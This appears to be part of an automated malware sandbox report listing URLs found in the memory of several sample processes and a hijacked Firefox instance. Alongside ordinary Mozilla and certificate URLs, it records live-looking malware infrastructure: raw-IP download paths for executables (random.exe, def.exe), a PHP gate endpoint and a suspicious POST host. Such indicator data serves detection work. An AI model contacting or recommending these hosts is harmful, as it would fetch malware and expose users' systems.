Source: unknown HTTP traffic detected: POST /api HTTP/1.1Connection: Keep-AliveContent-Type: application/x-www-form-urlencodedUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36Content-Length: 8Host: necklacedmny.store
Source: firefox.exe, 00000019.00000002.3040789860.0000025E80E47000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.3009852946.0000025E7106A000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://127.0.0.1:
Source: file.exe, 00000000.00000003.2259589967.0000000001761000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 21024c5511.exe, 00000009.00000003.2997206794.00000000012EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/
Source: file.exe, 00000000.00000003.2259589967.0000000001761000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/B
Source: file.exe, 00000000.00000003.2259589967.0000000001761000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/K
Source: file.exe, 00000000.00000003.2259589967.0000000001761000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/P
Source: file.exe, 00000000.00000003.2259589967.0000000001761000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 21024c5511.exe, 00000009.00000003.2997206794.00000000012EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/mine/random.exe
Source: 21024c5511.exe, 00000009.00000003.2997206794.00000000012EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe
Source: 21024c5511.exe, 00000009.00000003.2997206794.00000000012EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe-
Source: 21024c5511.exe, 00000009.00000003.2997206794.00000000012EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exe47
Source: file.exe, 00000000.00000003.2259589967.0000000001761000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeP
Source: file.exe, 00000000.00000003.2259589967.0000000001761000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exeUg
Source: 21024c5511.exe, 00000009.00000003.2997206794.00000000012EA000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exee
Source: file.exe, 00000000.00000003.2259589967.0000000001761000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.16/off/def.exefaC
Source: 996773cd54.exe, 0000000A.00000002.2813065067.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000001A.00000002.2876974078.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000001A.00000002.2876974078.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, 996773cd54.exe, 0000001D.00000002.3000201409.000000000067B000.00000004.00000020.00020000.00000000.sdmp, num.exe, 00000024.00000002.3084290708.0000000000D47000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206
Source: 996773cd54.exe, 0000000A.00000002.2813065067.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000001A.00000002.2876974078.0000000000CBE000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000001A.00000002.2876974078.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000001A.00000002.2876974078.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, 996773cd54.exe, 0000001D.00000002.3000201409.00000000006CF000.00000004.00000020.00020000.00000000.sdmp, 996773cd54.exe, 0000001D.00000002.3000201409.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, 996773cd54.exe, 0000001D.00000002.3000201409.000000000067B000.00000004.00000020.00020000.00000000.sdmp, num.exe, 00000024.00000002.3084290708.0000000000D86000.00000004.00000020.00020000.00000000.sdmp, num.exe, 00000024.00000002.3084290708.0000000000D47000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/
Source: 996773cd54.exe, 0000000A.00000002.2813065067.0000000000A48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/3
Source: 996773cd54.exe, 0000000A.00000002.2813065067.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000001A.00000002.2876974078.0000000000C8E000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000001A.00000002.2876974078.0000000000CE1000.00000004.00000020.00020000.00000000.sdmp, num.exe, 0000001A.00000002.2876974078.0000000000CF0000.00000004.00000020.00020000.00000000.sdmp, 996773cd54.exe, 0000001D.00000002.3000201409.00000000006D6000.00000004.00000020.00020000.00000000.sdmp, 996773cd54.exe, 0000001D.00000002.3000201409.000000000067B000.00000004.00000020.00020000.00000000.sdmp, num.exe, 00000024.00000002.3084290708.0000000000D86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php
Source: 996773cd54.exe, 0000000A.00000002.2813065067.0000000000A48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.php_
Source: 996773cd54.exe, 0000000A.00000002.2813065067.00000000009EE000.00000004.00000020.00020000.00000000.sdmp, 996773cd54.exe, 0000001D.00000002.3000201409.000000000067B000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/6c4adf523b719729.phps
Source: 996773cd54.exe, 0000000A.00000002.2813065067.0000000000A35000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/I
Source: 996773cd54.exe, 0000000A.00000002.2813065067.0000000000A48000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/Q
Source: 996773cd54.exe, 0000000A.00000002.2813065067.0000000000A48000.00000004.00000020.00020000.00000000.sdmp, num.exe, 00000024.00000002.3084290708.0000000000D86000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://185.215.113.206/m
Source: firefox.exe, 00000019.00000002.3069732243.0000025E825BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.0/
Source: firefox.exe, 00000019.00000002.3069732243.0000025E825BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearch/1.1/
Source: firefox.exe, 00000019.00000002.3069732243.0000025E825BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.0/
Source: firefox.exe, 00000019.00000002.3069732243.0000025E825BE000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://a9.com/-/spec/opensearchdescription/1.1/
Source: file.exe, 00000000.00000003.2105697595.0000000005F9D000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 00000009.00000003.2783822067.0000000005BFE000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2909020887.0000000005ABD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3062161151.0000025E81C49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0
Source: file.exe, 00000000.00000003.2105697595.0000000005F9D000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 00000009.00000003.2783822067.0000000005BFE000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2909020887.0000000005ABD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3062161151.0000025E81C49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootCA.crt0B
Source: firefox.exe, 00000019.00000002.3018136513.0000025E7CE7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%s
Source: firefox.exe, 00000019.00000002.3023518743.0000025E7D279000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%sresource://gre/modules/ExtHandlerService.sys.mjsreso
Source: firefox.exe, 00000019.00000002.3038492553.0000025E80CC5000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://compose.mail.yahoo.co.jp/ym/Compose?To=%ss
Source: 21024c5511.exe, 0000000E.00000003.2999480700.0000000001064000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2973927647.0000000001064000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2979596133.0000000001064000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2958108070.0000000001064000.00000004.00000020.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2933392825.0000000001064000.00000004.00000020.00020000.00000000.sdmp String found in binary or memory: http://crl.microXW
Source: file.exe, 00000000.00000003.2105697595.0000000005F9D000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 00000009.00000003.2783822067.0000000005BFE000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2909020887.0000000005ABD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3062161151.0000025E81C49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl.rootca1.amazontrust.com/rootca1.crl0
Source: file.exe, 00000000.00000003.2105697595.0000000005F9D000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 00000009.00000003.2783822067.0000000005BFE000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2909020887.0000000005ABD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3062161151.0000025E81C49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl07
Source: file.exe, 00000000.00000003.2105697595.0000000005F9D000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 00000009.00000003.2783822067.0000000005BFE000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2909020887.0000000005ABD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3062161151.0000025E81C49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootCA.crl0=
Source: file.exe, 00000000.00000003.2105697595.0000000005F9D000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 00000009.00000003.2783822067.0000000005BFE000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2909020887.0000000005ABD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3062161151.0000025E81C49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootCA.crl00
Source: file.exe, 00000000.00000003.2105697595.0000000005F9D000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 00000009.00000003.2783822067.0000000005BFE000.00000004.00000800.00020000.00000000.sdmp, 21024c5511.exe, 0000000E.00000003.2909020887.0000000005ABD000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3062161151.0000025E81C49000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://crt.rootca1.amazontrust.com/rootca1.cer0?
Source: firefox.exe, 00000019.00000002.3059082762.0000025E81B17000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com
Source: firefox.exe, 00000019.00000002.3040789860.0000025E80E47000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/
Source: firefox.exe, 00000019.00000002.3028948986.0000025E7E9C7000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D19000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/canonical.html
Source: firefox.exe, 00000019.00000003.2950883095.0000025E896E0000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv4
Source: firefox.exe, 00000019.00000003.2952140231.0000025E89654000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3031276524.0000025E7EF00000.00000002.08000000.00040000.00000000.sdmp, firefox.exe, 0000001C.00000002.3000052815.0000016C6FFA0000.00000002.10000000.00040000.00000000.sdmp, firefox.exe, 0000001E.00000002.3003646499.000001CB322A0000.00000002.08000000.00040000.00000000.sdmp String found in binary or memory: http://detectportal.firefox.com/success.txt?ipv6
Source: firefox.exe, 00000019.00000002.3013624425.0000025E7C826000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/common
Source: firefox.exe, 00000019.00000002.3013624425.0000025E7C861000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/dates-and-times
Source: firefox.exe, 00000019.00000002.3013624425.0000025E7C826000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/math
Source: firefox.exe, 00000019.00000002.3013624425.0000025E7C861000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/regular-expressions
Source: firefox.exe, 00000019.00000002.3013624425.0000025E7C826000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/sets
Source: firefox.exe, 00000019.00000002.3009852946.0000025E71003000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://exslt.org/strings
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-04/schema#
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-06/schema#
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D78000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://json-schema.org/draft-07/schema#
Source: firefox.exe, 00000019.00000002.3072562784.0000025E826E2000.00000004.00000800.00020000.00000000.sdmp, firefox.exe, 00000019.00000002.3064052338.0000025E81D6A000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org
Source: firefox.exe, 00000019.00000002.3028948986.0000025E7E9A2000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/additionalProperties
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsFeatureGate
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsShowLessFrequentlyCap
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/addonsUITreatment
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/appId
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/appName
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryEnabled
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/autoFillAdaptiveHistoryMinCharsThreshold
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bestMatchBlockingEnabled
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bestMatchEnabledhttp://mozilla.org/#/properties/mdnFeatureGate
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bestMatchEnabledhttp://mozilla.org/#/properties/mdnFeatureGateresour
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/featureId
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/featureIdhttp:/
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/feature/properties/value
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/ratio
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0/items/properties/slug
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/0http://mozilla.org/#/properties/featureIds/itemshttp
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/enabled
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/featureId
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/feature/properties/value
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/items/properties/value/ad
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/features/itemshttp://mozilla.org/#
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/ratio
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/1/items/properties/slug
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/featureI
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/items/properties/value/ad
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/features/itemsbrowser.newtabpage.a
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/ratio
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2/items/properties/slug
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/branches/anyOf/2http://mozilla.org/#/properties/targeting
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/count
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/namespace
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/randomizationUnit
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/start
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/bucketConfig/properties/total
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/channel
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D8B000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/csvImport
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/endDate
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/enrollmentEndDate
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/experimentType
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/experimentTypehttp://mozilla.org/#/properties/exposureResults
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/exposureResults
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/featureValidationOptOut
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/id
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isBestMatchExperiment
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isEnrollmentPaused
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/isRollout
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D78000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/0/additionalProperties/additionalProperties
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/1
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/localizations/anyOf/1http://mozilla.org/#/properties/pocketFeatureGa
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoClientVariants
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoEnabled
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoEnabledhttp://mozilla.org/#/additionalPropertiesawesome-bar-re
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoEndpointURL
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoEndpointURLhttp://mozilla.org/#/properties/pocketShowLessFrequ
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoProviders
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/merinoTimeoutMs
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes/items
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/priority
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D7D000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/outcomes/items/properties/slug
Source: firefox.exe, 00000019.00000002.3064052338.0000025E81D81000.00000004.00000800.00020000.00000000.sdmp String found in binary or memory: http://mozilla.org/#/properties/pocketFeatureGate
